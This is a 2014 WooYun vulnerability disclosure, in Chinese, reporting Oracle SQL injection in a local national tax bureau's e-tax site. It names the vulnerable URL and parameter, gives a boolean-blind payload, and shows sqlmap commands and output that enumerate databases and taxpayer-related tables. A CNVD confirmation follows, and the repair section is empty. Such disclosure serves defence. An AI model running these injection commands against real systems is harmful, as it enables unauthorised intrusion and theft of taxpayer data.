[公开漏洞]某地国家税务局存在Oracle注入

某地国家税务局存在Oracle注入 相关厂商： 某地国家税务局 漏洞作者：bluz 提交时间：2014-06-03 15:03 公开时间：2014-07-18 15:03 漏洞类型：SQL注射漏洞 危害等级：高 自评Rank：15 漏洞状态： 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源：http://www.wooyun.org Tags标签： 无 漏洞详情 披露状态：

2014-06-03：细节已通知厂商并且等待厂商处理中
2014-06-08：厂商已经确认，细节仅向厂商公开
2014-06-18：细节向核心白帽子及相关领域专家公开
2014-06-28：细节向普通白帽子公开
2014-07-08：细节向实习白帽子公开
2014-07-18：细节向公众公开

简要描述：

某地国家税务局存在注入，不多说看下面！

详细说明：

某地国家税务局存在注入，不多说看下面！

漏洞证明：

https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88





GET parameter 'lcdm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

sqlmap identified the following injection points with a total of 104 HTTP(s) requests:

---

Place: GET

Parameter: lcdm

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: lcdm=88 AND 5155=5155

---

[11:46:08] [INFO] testing MySQL

[11:46:09] [WARNING] the back-end DBMS is not MySQL

[11:46:09] [INFO] testing Oracle

[11:46:10] [INFO] confirming Oracle

[11:46:10] [INFO] the back-end DBMS is Oracle

web application technology: Servlet 2.5, JSP 2.1, Apache 2.2.26

back-end DBMS: Oracle





sqlmap -u "https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88" --dbs



available databases [4]:

[*] NSFW

[*] SYS

[*] SYSTEM

[*] WMSYS



sqlmap -u "https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/zhinan.jsp?lcdm=88" --tables -D "NSFW"



[12:00:59] [INFO] resumed: SB_DY_DZJKPZ

[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_KJZD

[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_SYYH

[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_XQY

[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_YBQY

[12:00:59] [INFO] resumed: SB_CWBB_ZCFZB_ZQGS

[12:00:59] [INFO] resumed: DJ_NSRXX_BS

[12:00:59] [INFO] resumed: DJ_NSRXX_LXXX

[12:00:59] [INFO] resumed: DM_BDMB

[12:00:59] [INFO] resumed: DM_CWBBZL

[12:00:59] [INFO] resumed: DM_CZRY

由于表太多。机器太差劲没有跑完。这样就差不多了

修复方案：

版权声明：转载请注明来源 bluz@乌云

漏洞回应 厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2014-06-08 10:14

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给浙江分中心处置，涉及信息泄露风险，rank 11

最新状态：

暂无